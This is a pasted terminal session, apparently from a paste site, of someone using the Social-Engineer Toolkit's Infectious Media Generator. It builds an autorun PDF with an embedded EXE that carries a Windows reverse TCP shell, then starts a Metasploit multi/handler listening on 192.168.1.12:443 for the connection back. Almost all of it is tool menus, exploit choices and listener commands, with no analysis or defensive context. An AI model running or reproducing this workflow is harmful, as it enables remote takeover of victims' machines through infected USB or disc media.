· 6 years ago · Nov 26, 2018, 08:46 PM
Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 7.7.9
                   Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

   1) File-Format Exploits
   2) Standard Metasploit Executable

  99) Return to Main Menu

set:infectious>1
set:infectious> IP address for the reverse connection (payload):
/usr/share/metasploit-framework/

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>13


[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.

    1. Use your own PDF for attack
    2. Use built-in BLANK PDF for attack

set:payloads>2

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>1
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.12]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Payload creation complete.
[*] All payloads get sent to the template.pdf directory
[*] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]: yes
[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use multi/handler
resource (/root/.set/meta_config)> set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
resource (/root/.set/meta_config)> set lhost 192.168.1.12
lhost => 192.168.1.12
resource (/root/.set/meta_config)> set lport 443
lport => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.12:443
msf exploit(multi/handler) >